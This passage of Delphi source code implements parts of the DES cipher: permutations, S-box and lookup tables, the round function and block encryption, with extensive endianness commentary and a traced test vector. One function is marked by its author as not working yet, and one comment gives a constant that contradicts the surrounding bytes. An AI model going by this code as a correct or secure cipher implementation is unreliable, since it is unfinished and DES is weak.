1111 1111 0000 1010 1010 1111 0000 1010 1010 In our native format drawing format, this is equivalent to: M = $EFCDAB8967452301; L = $FFCC00CC; R = $AAF0AAF0 } end; procedure IP_InverseTransform( L, R: uint32; var Datum: uint64); var T32: uint32; T16: word; T8: byte; { Start with input 64 bits (MLB left) 58 50 42 34 26 18 10 2 60 52 44 36 28 20 12 4 62 54 46 38 30 22 14 6 64 56 48 40 32 24 16 8 57 49 41 33 25 17 9 1 59 51 43 35 27 19 11 3 61 53 45 37 29 21 13 5 63 55 47 39 31 23 15 7 Your may recognise this as the IP table on page 10 of the standard. The above is drawn 1 byte per row, with the lowest address byte on the top row and the highest address byte on the bottom row. In a little-endien architecture, the first row is the Least Significant byte. In a big-endien architecture, the first row is the Most Significant byte. In either case, the first row is the lowest address byte. Within a byte, the bits are drawn from MSB on the left to LSB on the right. The numbers in the matrix are the DES designation for bits. The standard designates the 'first' bit to be bit 1 (or B1). I interpret 'first' bit to mean MSB. We can split these 64 bits into two 32 two bit native (little-endien) integers. L is first, followed by R. So .... L = 64 56 48 40 32 24 16 8 62 54 46 38 30 22 14 6 60 52 44 36 28 20 12 4 58 50 42 34 26 18 10 2 R = 63 55 47 39 31 23 15 7 61 53 45 37 29 21 13 5 59 51 43 35 27 19 11 3 57 49 41 33 25 17 9 1 The L, R is drawn from MSB on the left to LSB on the right. NOTE: The standard and most examples you can find are terribly endien-biggoted. They implicitly assume a big-endien architecture and are often ambigious in a little-endien context. For example, refer to "http://orlingrabbe.com/des.htm", section "How DES Works in Detail". In this example, M = the mathematical, unencoded number $123456789ABCDEF; but DES does not operate on numbers, it transforms blocks of 8 bytes. The article really means M = the 8 bytes (lowest address byte left-most): $01 $23 $45 $67 $89 $AB $CD $EF On a little-endien machine, this is the encoded form of the number $EFCDAB8967351201. or M: uint64 = $EFCDAB8967351201; The first byte is $01, and the first bit of the first byte is 0. In a binary lowest-address=byte-left, MSB-within-byte-left format, this datum is drawn: M = 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111 L = 0000 0001 0010 0011 0100 0101 0110 0111 R = 1000 1001 1010 1011 1100 1101 1110 1111 However, the same datum, drawn in a 'native' format (highest-address=byte-left, MSB-within-byte-left format) is drawn thus: M = 1110 1111 1100 1101 1010 1011 1000 1001 0110 0111 0100 0101 0010 0011 0000 0001 L = 0110 0111 0100 0101 0010 0011 0000 0001 R = 1110 1111 1100 1101 1010 1011 1000 1001 The word 'native' means in respect of how, in a little-endien machine, the drawing of an encoded number harmonises with the 'shl' operator shifting LEFT, and the shr operator shifting RIGHT. Reading these endien biggoted source documents can get really confusing until you acknowledge that there is more than one way to draw the same datum. Our goal is to reach ... 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 or equivalently .... L = 25 26 27 28 29 30 31 32 17 18 19 20 21 22 23 24 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 R = 57 58 59 60 61 62 63 64 49 50 51 52 53 54 55 56 41 42 43 44 45 46 47 48 33 34 35 36 37 38 39 40 } begin // Test case data: // L = $34324243 // R = $95D94C0A ==> // Datum = $05B40A0F5413E885 // convert ciphertext LR to plaintext M // L = 64 56 48 40 32 24 16 8 62 54 46 38 30 22 14 6 60 52 44 36 28 20 12 4 58 50 42 34 26 18 10 2 // R = 63 55 47 39 31 23 15 7 61 53 45 37 29 21 13 5 59 51 43 35 27 19 11 3 57 49 41 33 25 17 9 1 // Step 1. Do a 1 bit cross-over. // L = a-->d b // R = c d-->a T32 := ((L shr 1) xor R) and $55555555; R := R xor T32; L := L xor (T32 shl 1); // L = 55 56 39 40 23 24 7 8 53 54 37 38 21 22 5 6 51 52 35 36 19 20 3 4 49 50 33 34 17 18 1 2 // R = 63 64 47 48 31 32 15 16 61 62 45 46 29 30 13 14 59 60 43 44 27 28 11 12 57 58 41 42 25 26 9 10 // Step 2. Do a byte cross-over. // L = a-->d b // R = c d-->a T8 := LongRec(R).Bytes[0]; LongRec(R).Bytes[0] := LongRec(L).Bytes[1]; LongRec(L).Bytes[1] := T8; T8 := LongRec(R).Bytes[2]; LongRec(R).Bytes[2] := LongRec(L).Bytes[3]; LongRec(L).Bytes[3] := T8; // L = 61 62 45 46 29 30 13 14 | 53 54 37 38 21 22 5 6 | 57 58 41 42 25 26 9 10 | 49 50 33 34 17 18 1 2 // R = 63 64 47 48 31 32 15 16 | 55 56 39 40 23 24 7 8 | 59 60 43 44 27 28 11 12 | 51 52 35 36 19 20 3 4 // Step 3. Do a 2 bit cross-over. // L = a b-->c // R = c-->b d T32 := ((R shr 2) xor L) and $33333333; L := L xor T32; R := R xor (T32 shl 2); // L = 61 62 63 64 29 30 31 32 | 53 54 55 56 21 22 23 24 | 57 58 59 60 25 26 27 28 | 49 50 51 52 17 18 19 20 // R = 45 46 47 48 13 14 15 16 | 37 38 39 40 5 6 7 8 | 41 42 43 44 9 10 11 12 | 33 34 35 36 1 2 3 4 // Step 4. Do a word cross-over. // L = a b-->c // R = c-->b d Change here T16 := LongRec(L).Lo; LongRec(L).Lo := LongRec(R).Hi; LongRec(R).Hi := T16; // L = 61 62 63 64 29 30 31 32 | 53 54 55 56 21 22 23 24 | 45 46 47 48 13 14 15 16 | 37 38 39 40 5 6 7 8 // R = 57 58 59 60 25 26 27 28 | 49 50 51 52 17 18 19 20 | 41 42 43 44 9 10 11 12 | 33 34 35 36 1 2 3 4 // Step 5. Do a nibble cross-over // L = a-->d b // R = c d-->a T32 := ((L shr 4) xor R) and $0F0F0F0F; R := R xor T32; L := L xor (T32 shl 4); // L = 25 26 27 28 29 30 31 32 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 | 1 2 3 4 5 6 7 8 // R = 57 58 59 60 61 62 63 64 | 49 50 51 52 53 54 55 56 | 41 42 43 44 45 46 47 48 | 33 34 35 36 37 38 39 40 Int64Rec( Datum).Lo := L; Int64Rec( Datum).Hi := R end; function E_Bit_Selection( R: uint32): uint64; var i, j, k: integer; begin // E-bit selection table is ... //32 1 2 3 4 5 // 4 5 6 7 8 9 // 8 9 10 11 12 13 //12 13 14 15 16 17 //16 17 18 19 20 21 //20 21 22 23 24 25 //24 25 26 27 28 29 //28 29 30 31 32 1 // where R is ... // R = 25 26 27 28 29 30 31 32 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 | 1 2 3 4 5 6 7 8 // Example data from http://orlingrabbe.com/des.htm // R0 = 1111 0000 1010 1010 1111 0000 1010 1010 (big-endien 32) // R0 = $AAF0AAF0; // E(R0) = 011110 100001 010101 010101 011110 100001 010101 010101 (big-endien 48) // E(R0) = 010101 010101 100001 011110 010101 010101 100001 011110 (little-endien 48) // E(R0) = 00010101 00010101 00100001 00011110 00010101 00010101 00100001 00011110 (little-endien 64 = 48 + 2MBS zeros per row) // E(R0) = 00010101 00010101 00100001 00011110 00010101 00010101 00100001 00011110 (little-endien 64 = 48 + 2MBS zeros per row) // E(R0) = $1515211E1515211E; (Delphi) j := 1; for i := 0 to 3 do begin k := i + 1; if k = 4 then k := 0; Int64Rec( result).Bytes[j] := ((LongRec( R).Bytes[i] shl 1) and $3F) xor (LongRec( R).Bytes[k] shr 7); Inc( j); if j = 8 then j := 0; Int64Rec( result).Bytes[j] := ((LongRec( R).Bytes[i] shl 5) and $3F) xor (LongRec( R).Bytes[k] shr 3); Inc( j) end; end; const SBox: array[ {Subkey:}0..7, {B-value:}0..63] of 0.. 15 = ( {Subkey 0} ( 14, 0, 4, 15, 13, 7, 1, 4, 2, 14, 15, 2, 11, 13, 8, 1, 3, 10, 10, 6, 6, 12, 12, 11, 5, 9, 9, 5, 0, 3, 7, 8, 4, 15, 1, 12, 14, 8, 8, 2, 13, 4, 6, 9, 2, 1, 11, 7, 15, 5, 12, 11, 9, 3, 7, 14, 3, 10, 10, 0, 5, 6, 0, 13), {Subkey 1} ( 15, 3, 1, 13, 8, 4, 14, 7, 6, 15, 11, 2, 3, 8, 4, 14, 9, 12, 7, 0, 2, 1, 13, 10, 12, 6, 0, 9, 5, 11, 10, 5, 0, 13, 14, 8, 7, 10, 11, 1, 10, 3, 4, 15, 13, 4, 1, 2, 5, 11, 8, 6, 12, 7, 6, 12, 9, 0, 3, 5, 2, 14, 15, 9), {Subkey 2} ( 10, 13, 0, 7, 9, 0, 14, 9, 6, 3, 3, 4, 15, 6, 5, 10, 1, 2, 13, 8, 12, 5, 7, 14, 11, 12, 4, 11, 2, 15, 8, 1, 13, 1, 6, 10, 4, 13, 9, 0, 8, 6, 15, 9, 3, 8, 0, 7, 11, 4, 1, 15, 2, 14, 12, 3, 5, 11, 10, 5, 14, 2, 7, 12), {Subkey 3} ( 7, 13, 13, 8, 14, 11, 3, 5, 0, 6, 6, 15, 9, 0, 10, 3, 1, 4, 2, 7, 8, 2, 5, 12, 11, 1, 12, 10, 4, 14, 15, 9, 10, 3, 6, 15, 9, 0, 0, 6, 12, 10, 11, 1, 7, 13, 13, 8, 15, 9, 1, 4, 3, 5, 14, 11, 5, 12, 2, 7, 8, 2, 4, 14), {Subkey 4} ( 2, 14, 12, 11, 4, 2, 1, 12, 7, 4, 10, 7, 11, 13, 6, 1, 8, 5, 5, 0, 3, 15, 15, 10, 13, 3, 0, 9, 14, 8, 9, 6, 4, 11, 2, 8, 1, 12, 11, 7, 10, 1, 13, 14, 7, 2, 8, 13, 15, 6, 9, 15, 12, 0, 5, 9, 6, 10, 3, 4, 0, 5, 14, 3), {Subkey 5} ( 12, 10, 1, 15, 10, 4, 15, 2, 9, 7, 2, 12, 6, 9, 8, 5, 0, 6, 13, 1, 3, 13, 4, 14, 14, 0, 7, 11, 5, 3, 11, 8, 9, 4, 14, 3, 15, 2, 5, 12, 2, 9, 8, 5, 12, 15, 3, 10, 7, 11, 0, 14, 4, 1, 10, 7, 1, 6, 13, 0, 11, 8, 6, 13), {Subkey 6} ( 4, 13, 11, 0, 2, 11, 14, 7, 15, 4, 0, 9, 8, 1, 13, 10, 3, 14, 12, 3, 9, 5, 7, 12, 5, 2, 10, 15, 6, 8, 1, 6, 1, 6, 4, 11, 11, 13, 13, 8, 12, 1, 3, 4, 7, 10, 14, 7, 10, 9, 15, 5, 6, 0, 8, 15, 0, 14, 5, 2, 9, 3, 2, 12), {Subkey 7} ( 13, 1, 2, 15, 8, 13, 4, 8, 6, 10, 15, 3, 11, 7, 1, 4, 10, 12, 9, 5, 3, 6, 14, 11, 5, 0, 0, 14, 12, 9, 7, 2, 7, 2, 11, 1, 4, 14, 1, 7, 9, 4, 12, 10, 14, 8, 2, 13, 0, 15, 6, 12, 10, 9, 13, 0, 15, 3, 3, 5, 5, 6, 8, 11)); BytePermute_8_6_7_2_5_3_4_1: array[ byte ] of byte = ( $00, $80, $20, $A0, $40, $C0, $60, $E0, $08, $88, $28, $A8, $48, $C8, $68, $E8, $02, $82, $22, $A2, $42, $C2, $62, $E2, $0A, $8A, $2A, $AA, $4A, $CA, $6A, $EA, $04, $84, $24, $A4, $44, $C4, $64, $E4, $0C, $8C, $2C, $AC, $4C, $CC, $6C, $EC, $06, $86, $26, $A6, $46, $C6, $66, $E6, $0E, $8E, $2E, $AE, $4E, $CE, $6E, $EE, $10, $90, $30, $B0, $50, $D0, $70, $F0, $18, $98, $38, $B8, $58, $D8, $78, $F8, $12, $92, $32, $B2, $52, $D2, $72, $F2, $1A, $9A, $3A, $BA, $5A, $DA, $7A, $FA, $14, $94, $34, $B4, $54, $D4, $74, $F4, $1C, $9C, $3C, $BC, $5C, $DC, $7C, $FC, $16, $96, $36, $B6, $56, $D6, $76, $F6, $1E, $9E, $3E, $BE, $5E, $DE, $7E, $FE, $01, $81, $21, $A1, $41, $C1, $61, $E1, $09, $89, $29, $A9, $49, $C9, $69, $E9, $03, $83, $23, $A3, $43, $C3, $63, $E3, $0B, $8B, $2B, $AB, $4B, $CB, $6B, $EB, $05, $85, $25, $A5, $45, $C5, $65, $E5, $0D, $8D, $2D, $AD, $4D, $CD, $6D, $ED, $07, $87, $27, $A7, $47, $C7, $67, $E7, $0F, $8F, $2F, $AF, $4F, $CF, $6F, $EF, $11, $91, $31, $B1, $51, $D1, $71, $F1, $19, $99, $39, $B9, $59, $D9, $79, $F9, $13, $93, $33, $B3, $53, $D3, $73, $F3, $1B, $9B, $3B, $BB, $5B, $DB, $7B, $FB, $15, $95, $35, $B5, $55, $D5, $75, $F5, $1D, $9D, $3D, $BD, $5D, $DD, $7D, $FD, $17, $97, $37, $B7, $57, $D7, $77, $F7, $1F, $9F, $3F, $BF, $5F, $DF, $7F, $FF); BytePermute_3_8_4_5_6_2_7_1: array[ byte ] of byte = ( $00, $40, $02, $42, $08, $48, $0A, $4A, $10, $50, $12, $52, $18, $58, $1A, $5A, $20, $60, $22, $62, $28, $68, $2A, $6A, $30, $70, $32, $72, $38, $78, $3A, $7A, $80, $C0, $82, $C2, $88, $C8, $8A, $CA, $90, $D0, $92, $D2, $98, $D8, $9A, $DA, $A0, $E0, $A2, $E2, $A8, $E8, $AA, $EA, $B0, $F0, $B2, $F2, $B8, $F8, $BA, $FA, $04, $44, $06, $46, $0C, $4C, $0E, $4E, $14, $54, $16, $56, $1C, $5C, $1E, $5E, $24, $64, $26, $66, $2C, $6C, $2E, $6E, $34, $74, $36, $76, $3C, $7C, $3E, $7E, $84, $C4, $86, $C6, $8C, $CC, $8E, $CE, $94, $D4, $96, $D6, $9C, $DC, $9E, $DE, $A4, $E4, $A6, $E6, $AC, $EC, $AE, $EE, $B4, $F4, $B6, $F6, $BC, $FC, $BE, $FE, $01, $41, $03, $43, $09, $49, $0B, $4B, $11, $51, $13, $53, $19, $59, $1B, $5B, $21, $61, $23, $63, $29, $69, $2B, $6B, $31, $71, $33, $73, $39, $79, $3B, $7B, $81, $C1, $83, $C3, $89, $C9, $8B, $CB, $91, $D1, $93, $D3, $99, $D9, $9B, $DB, $A1, $E1, $A3, $E3, $A9, $E9, $AB, $EB, $B1, $F1, $B3, $F3, $B9, $F9, $BB, $FB, $05, $45, $07, $47, $0D, $4D, $0F, $4F, $15, $55, $17, $57, $1D, $5D, $1F, $5F, $25, $65, $27, $67, $2D, $6D, $2F, $6F, $35, $75, $37, $77, $3D, $7D, $3F, $7F, $85, $C5, $87, $C7, $8D, $CD, $8F, $CF, $95, $D5, $97, $D7, $9D, $DD, $9F, $DF, $A5, $E5, $A7, $E7, $AD, $ED, $AF, $EF, $B5, $F5, $B7, $F7, $BD, $FD, $BF, $FF); BytePermute_1_2_7_4_5_6_3_8: array[ byte ] of byte = ( $00, $01, $20, $21, $04, $05, $24, $25, $08, $09, $28, $29, $0C, $0D, $2C, $2D, $10, $11, $30, $31, $14, $15, $34, $35, $18, $19, $38, $39, $1C, $1D, $3C, $3D, $02, $03, $22, $23, $06, $07, $26, $27, $0A, $0B, $2A, $2B, $0E, $0F, $2E, $2F, $12, $13, $32, $33, $16, $17, $36, $37, $1A, $1B, $3A, $3B, $1E, $1F, $3E, $3F, $40, $41, $60, $61, $44, $45, $64, $65, $48, $49, $68, $69, $4C, $4D, $6C, $6D, $50, $51, $70, $71, $54, $55, $74, $75, $58, $59, $78, $79, $5C, $5D, $7C, $7D, $42, $43, $62, $63, $46, $47, $66, $67, $4A, $4B, $6A, $6B, $4E, $4F, $6E, $6F, $52, $53, $72, $73, $56, $57, $76, $77, $5A, $5B, $7A, $7B, $5E, $5F, $7E, $7F, $80, $81, $A0, $A1, $84, $85, $A4, $A5, $88, $89, $A8, $A9, $8C, $8D, $AC, $AD, $90, $91, $B0, $B1, $94, $95, $B4, $B5, $98, $99, $B8, $B9, $9C, $9D, $BC, $BD, $82, $83, $A2, $A3, $86, $87, $A6, $A7, $8A, $8B, $AA, $AB, $8E, $8F, $AE, $AF, $92, $93, $B2, $B3, $96, $97, $B6, $B7, $9A, $9B, $BA, $BB, $9E, $9F, $BE, $BF, $C0, $C1, $E0, $E1, $C4, $C5, $E4, $E5, $C8, $C9, $E8, $E9, $CC, $CD, $EC, $ED, $D0, $D1, $F0, $F1, $D4, $D5, $F4, $F5, $D8, $D9, $F8, $F9, $DC, $DD, $FC, $FD, $C2, $C3, $E2, $E3, $C6, $C7, $E6, $E7, $CA, $CB, $EA, $EB, $CE, $CF, $EE, $EF, $D2, $D3, $F2, $F3, $D6, $D7, $F6, $F7, $DA, $DB, $FA, $FB, $DE, $DF, $FE, $FF); BytePermute_1_7_8_6_2_5_3_4: array[ byte ] of byte = ( $00, $20, $40, $60, $10, $30, $50, $70, $04, $24, $44, $64, $14, $34, $54, $74, $01, $21, $41, $61, $11, $31, $51, $71, $05, $25, $45, $65, $15, $35, $55, $75, $02, $22, $42, $62, $12, $32, $52, $72, $06, $26, $46, $66, $16, $36, $56, $76, $03, $23, $43, $63, $13, $33, $53, $73, $07, $27, $47, $67, $17, $37, $57, $77, $08, $28, $48, $68, $18, $38, $58, $78, $0C, $2C, $4C, $6C, $1C, $3C, $5C, $7C, $09, $29, $49, $69, $19, $39, $59, $79, $0D, $2D, $4D, $6D, $1D, $3D, $5D, $7D, $0A, $2A, $4A, $6A, $1A, $3A, $5A, $7A, $0E, $2E, $4E, $6E, $1E, $3E, $5E, $7E, $0B, $2B, $4B, $6B, $1B, $3B, $5B, $7B, $0F, $2F, $4F, $6F, $1F, $3F, $5F, $7F, $80, $A0, $C0, $E0, $90, $B0, $D0, $F0, $84, $A4, $C4, $E4, $94, $B4, $D4, $F4, $81, $A1, $C1, $E1, $91, $B1, $D1, $F1, $85, $A5, $C5, $E5, $95, $B5, $D5, $F5, $82, $A2, $C2, $E2, $92, $B2, $D2, $F2, $86, $A6, $C6, $E6, $96, $B6, $D6, $F6, $83, $A3, $C3, $E3, $93, $B3, $D3, $F3, $87, $A7, $C7, $E7, $97, $B7, $D7, $F7, $88, $A8, $C8, $E8, $98, $B8, $D8, $F8, $8C, $AC, $CC, $EC, $9C, $BC, $DC, $FC, $89, $A9, $C9, $E9, $99, $B9, $D9, $F9, $8D, $AD, $CD, $ED, $9D, $BD, $DD, $FD, $8A, $AA, $CA, $EA, $9A, $BA, $DA, $FA, $8E, $AE, $CE, $EE, $9E, $BE, $DE, $FE, $8B, $AB, $CB, $EB, $9B, $BB, $DB, $FB, $8F, $AF, $CF, $EF, $9F, $BF, $DF, $FF); BytePermute_8_7_5_6_4_3_1_2: array[ byte ] of byte = ( $00, $80, $40, $C0, $10, $90, $50, $D0, $20, $A0, $60, $E0, $30, $B0, $70, $F0, $08, $88, $48, $C8, $18, $98, $58, $D8, $28, $A8, $68, $E8, $38, $B8, $78, $F8, $04, $84, $44, $C4, $14, $94, $54, $D4, $24, $A4, $64, $E4, $34, $B4, $74, $F4, $0C, $8C, $4C, $CC, $1C, $9C, $5C, $DC, $2C, $AC, $6C, $EC, $3C, $BC, $7C, $FC, $01, $81, $41, $C1, $11, $91, $51, $D1, $21, $A1, $61, $E1, $31, $B1, $71, $F1, $09, $89, $49, $C9, $19, $99, $59, $D9, $29, $A9, $69, $E9, $39, $B9, $79, $F9, $05, $85, $45, $C5, $15, $95, $55, $D5, $25, $A5, $65, $E5, $35, $B5, $75, $F5, $0D, $8D, $4D, $CD, $1D, $9D, $5D, $DD, $2D, $AD, $6D, $ED, $3D, $BD, $7D, $FD, $02, $82, $42, $C2, $12, $92, $52, $D2, $22, $A2, $62, $E2, $32, $B2, $72, $F2, $0A, $8A, $4A, $CA, $1A, $9A, $5A, $DA, $2A, $AA, $6A, $EA, $3A, $BA, $7A, $FA, $06, $86, $46, $C6, $16, $96, $56, $D6, $26, $A6, $66, $E6, $36, $B6, $76, $F6, $0E, $8E, $4E, $CE, $1E, $9E, $5E, $DE, $2E, $AE, $6E, $EE, $3E, $BE, $7E, $FE, $03, $83, $43, $C3, $13, $93, $53, $D3, $23, $A3, $63, $E3, $33, $B3, $73, $F3, $0B, $8B, $4B, $CB, $1B, $9B, $5B, $DB, $2B, $AB, $6B, $EB, $3B, $BB, $7B, $FB, $07, $87, $47, $C7, $17, $97, $57, $D7, $27, $A7, $67, $E7, $37, $B7, $77, $F7, $0F, $8F, $4F, $CF, $1F, $9F, $5F, $DF, $2F, $AF, $6F, $EF, $3F, $BF, $7F, $FF); function DES_Permute( SubKeyRound: integer; R: uint32; const Key: TExpandedKey): uint32; // NOT WORKING YET !!! var i, j: integer; T48, E: uint64; b: ^byte; b0, b1, b2, b3, t8: byte; b1b0, b3b2: word; t16: word; begin // SubKeyRound = 0; // R= $AAF0AAF0; // Key = as per http://orlingrabbe.com/des.htm example. // result should be = 0010 0011 0100 1010 1010 1001 1011 1011 (big-endien) E := E_Bit_Selection( R); T48 := E xor Key[ SubKeyRound]; // R0 = 1111 0000 1010 1010 1111 0000 1010 1010 (big-endien) = $AAF0AAF0; // E(R0) = 011110 100001 010101 010101 011110 100001 010101 010101 (big-endien) // = $1515211E1515211E; // K1 = Key[0] = 000110 110000 001011 101111 111111 000111 000001 110010 (big-endien) // = $3201073F2F0B3006; // f = K1+E(R0) = 011000 010001 011110 111010 100001 100110 010100 100111 (big-endien) // = $271426213A1E1118; b := @T48; for j := 0 to 7 do begin // b = @Int64Rec( T48).Bytes[ j]; b^ := SBox[ j, b^]; Inc( b, 1) end; // S1(B1)S2(B2)S3(B3)S4(B4)S5(B5)S6(B6)S7(B7)S8(B8) // = 0101 1100 1000 0010 1011 0101 1001 0111 (big-endien compact) // = $0709050B02080C05; j := 0; for i := 0 to 3 do begin LongRec( result).Bytes[i] := (Int64Rec( T48).Bytes[j ] shl 4) xor Int64Rec( T48).Bytes[j+1]; Inc( j, 2) end; // = 0101 1100 1000 0010 1011 0101 1001 0111 (big-endien 32) // = $97B5825C; // In the following fragment, we do the P-32 transform. This is ... // P-32 transform // 16 7 20 21 // 29 12 28 17 // 1 15 23 26 // 5 18 31 10 // 2 8 24 14 // 32 27 3 9 // 19 13 30 6 // 22 11 4 25 // which should transform 0101 1100 1000 0010 1011 0101 1001 0111 (big-endien 32) = $97B5825C // to 0010 0011 0100 1010 1010 1001 1011 1011 (big-endien 32) = $BBA94A23 // Equivalently in bytes ... // 16 7 20 21 29 12 28 17 // 1 15 23 26 5 18 31 10 // 2 8 24 14 32 27 3 9 // 19 13 30 6 22 11 4 25 // Start with .. b0 := LongRec( result).Bytes[0]; // 1 2 3 4 5 6 7 8 b1 := LongRec( result).Bytes[1]; // 9 10 11 12 13 14 15 16 b2 := LongRec( result).Bytes[2]; // 17 18 19 20 21 22 23 24 b3 := LongRec( result).Bytes[3]; // 25 26 27 28 29 30 31 32 // Case Study numbers. // b0 = 92 (decimal) = $5C = [0 1 0 1 | 1 1 0 0] (binary; MSB..LSB) // b1 = 130 (decimal) = $82 = [1 0 0 0 | 0 0 1 0] // b2 = 181 (decimal) = $B5 = [1 0 1 1 | 0 1 0 1] // b3 = 151 (decimal) = $97 = [1 0 0 1 | 0 1 1 1] // [25 26 27 28 29 30 31 32] --> [32 30 31 26 29 27 28 25] b3 := BytePermute_8_6_7_2_5_3_4_1[ b3]; // Case Study: b3 = [1 1 1 0 0 0 1 1] = $E3 // [17 18 19 20 21 22 23 24] --> [19 24 20 21 22 18 23 17] b2 := BytePermute_3_8_4_5_6_2_7_1[ b2]; // Case Study: b2 = [1 1 1 0 1 0 0 1] = $E9 // b2 = 19 24 20 21 22 18 23 17 // b3 = 32 30 31 26 29 27 28 25 // Swap these bits, between b2 and b3: // swaps: ** ** ** ** t8 := (b2 xor b3) and $8E; b2 := b2 xor t8; b3 := b3 xor t8; // b2 = 32 24 20 21 29 27 28 17 // b3 = 19 30 31 26 22 18 23 25 // Case Study: b2 = [1 1 1 0 0 0 1 1] = $E3 // Case Study: b3 = [1 1 1 0 1 0 0 1] = $E9 // Swap these bits on b3: // vv xx // 19 30 31 26 22 18 23 25 // [19 30 31 26 22 18 23 25] --> [19 30 31 26 22 18 23 25] b3 := BytePermute_1_2_7_4_5_6_3_8[ b3]; // Or equivalently, we could have put: // t8 := (b3 xor (b3 shr 4)) and $02; // b3 := b3 xor t8 xor (t8 shl 4); // to get ... // 19 30 23 26 22 18 31 25 // Case Study: b3 = [1 1 0 0 1 0 1 1] = $CB // Back to the first two bytes. // b0 = 1 2 3 4 5 6 7 8 // b1 = 9 10 11 12 13 14 15 16 // [1 2 3 4 5 6 7 8] --> [1 7 8 6 2 5 3 4] b0 := BytePermute_1_7_8_6_2_5_3_4[ b0]; // Case Study: b0 = [0 0 0 1 1 1 0 1] = $1D // [9 10 11 12 13 14 15 16] --> [16 15 13 14 12 11 9 10] b1 := BytePermute_8_7_5_6_4_3_1_2[ b1]; // Case Study: b1 = [0 1 0 0 0 0 1 0] = $42 // b0 = 1 7 8 6 2 5 3 4 // b1 = 16 15 13 14 12 11 9 10 //Now swap these bits ... // b0 = 1 7 8 6 2 5 3 4 // ** ** // b1 = 16 15 13 14 12 11 9 10 t8 := (b0 xor b1) and $90; b0 := b0 xor t8; b1 := b1 xor t8; //to get this // b0 = 16 7 8 14 2 5 3 4 // b1 = 1 15 13 6 12 11 9 10 // Case Study: b0 = [0 0 0 0 1 1 0 1] = $0D // Case Study: b1 = [0 1 0 1 0 0 1 0] = $52 // Now switch these bits ... // b0 = 16 7 8 14 2 5 3 4 // ^^ ^^ // vv vv // b1 = 1 15 13 6 12 11 9 10 t8 := (b0 xor (b1 shr 1)) and $05; b0 := b0 xor t8; b1 := b1 xor (t8 shl 1); //to get this ... // b0 = 16 7 8 14 2 12 3 9 // b1 = 1 15 13 6 5 11 4 10 // Case Study: b0 = [0 0 0 0 1 0 0 1] = $09 // Case Study: b1 = [0 1 0 1 1 0 1 0] = $5A // Now swap these bits ... // b1|b0= 1 15 13 6 5 11 4 10 16 7 8 14 2 12 3 9 (little-endien) // ** ** ** ** ** ** ** ** ** // b3|b2=19 30 23 26 22 18 31 25 32 24 20 21 29 27 28 17 WordRec( b1b0).Lo := b0; WordRec( b1b0).Hi := b1; WordRec( b3b2).Lo := b2; WordRec( b3b2).Hi := b3; // Case Study: b1b0 = $5A09 // Case Study: b3b2 = $CBE3 t16 := (b1b0 xor b3b2) and $363B; b1b0 := b1b0 xor t16; b3b2 := b3b2 xor t16; //to get this ... // b1|b0= 1 15 23 26 5 18 31 10 16 7 20 21 29 12 28 17 // b3|b2=19 30 13 6 22 11 4 25 32 24 8 14 2 27 3 9 // Case Study: b1b0 = [0 1 0 0 | 1 0 1 0 | 0 0 1 0 | 0 0 1 1] = $4A23 // Case Study: b3b2 = [1 1 0 1 | 1 0 1 1 | 1 1 0 0 | 1 0 0 1] = $DBC9 // Now switch these bits ... // vv xx // b3|b2=19 30 13 6 22 11 4 25 32 24 8 14 2 27 3 9 t16 := (b3b2 xor (b3b2 shr 4)) and $0008; b3b2 := b3b2 xor t16 xor (t16 shl 4); //to get this ... // b3|b2=19 30 13 6 22 11 4 25 2 24 8 14 32 27 3 9 // Case Study: b3b2 = [1 1 0 1 | 1 0 1 1 | 1 1 0 0 | 1 0 0 1] = $DBC9 // Now switch these bits ... // vv xx vv xx // b3|b2=19 30 13 6 22 11 4 25 2 24 8 14 32 27 3 9 t16 := (b3b2 xor (b3b2 shr 1)) and $2020; b3b2 := b3b2 xor t16 xor (t16 shl 1); //to get this ... // b3|b2=19 13 30 6 22 11 4 25 2 8 24 14 32 27 3 9 // Case Study numbers. // 9 10 11 12 | 13 14 15 16 | 1 2 3 4 | 5 6 7 8 = [1 0 0 0 | 0 0 1 0 | 0 1 0 1 | 1 1 0 0] // 25 26 27 28 | 29 30 31 32 |17 18 19 20 | 21 22 23 24 = [1 0 0 1 | 0 1 1 1 | 1 0 1 1 | 0 1 0 1] // Case Study: b3b2 = [1 0 1 1 | 1 0 1 1 | 1 0 1 0 | 1 0 0 1] = $BBA9 // End result rendered as words.. // b1|b0= 1 15 23 26 5 18 31 10 16 7 20 21 29 12 28 17 // b3|b2=19 13 30 6 22 11 4 25 2 8 24 14 32 27 3 9 LongRec( result).Lo := b1b0; LongRec( result).Hi := b3b2 // End result rendered as bytes.. // b0 = 16 7 20 21 29 12 28 17 // b1 = 1 15 23 26 5 18 31 10 // b2= 2 8 24 14 32 27 3 9 // b3= 19 13 30 6 22 11 4 25 // End result rendered as nibbles.. // 16 7 20 21 // 29 12 28 17 // 1 15 23 26 // 5 18 31 10 // 2 8 24 14 // 32 27 3 9 // 19 13 30 6 // 22 11 4 25 // which is the P-32 transform. end; procedure DES_EncryptBlock( Plaintext: uint64; var Ciphertext: uint64; const Key: TExpandedKey); var L, R, T32: uint32; i: integer; begin IP_Transform( Plaintext, L, R); // L0 = 1100 1100 0000 0000 1100 1100 1111 1111 (big-endien) // R0 = 1111 0000 1010 1010 1111 0000 1010 1010 (big-endien) // L = $FFCC00CC // R = $AAF0AAF0 for i := 0 to 15 do begin T32 := DES_Permute( i, R, Key) xor L; // DES_Permute(i=0) = 0010 0011 0100 1010 1010 1001 1011 1011 (big-endien) = $BBA94A23 // L(i=0)= $FFCC00CC // T32(i=0)= 1110 1111 0100 1010 0110 0101 0100 0100 (big-endien) = $44654AEF L := R; R := T32 end; // L16 = 0100 0011 0100 0010 0011 0010 0011 0100 (big-endien) = $34324243 // R16 = 0000 1010 0100 1100 1101 1001 1001 0101 (big-endien) = $95D94C0A // Now Swap L & R and call the inverse IP transform. IP_InverseTransform( R, L, Ciphertext) // IP-1 = 10000101 11101000 00010011 01010100 00001111 00001010 10110100 00000101 (big-endien) // This is the encrypted form of M = 0123456789ABCDEF (big-endien): // namely, C = 85E813540F0AB405 (big-endien) OR // C = $05B40A0F5413E885 (delphi). end; procedure DES_DecryptBlock( 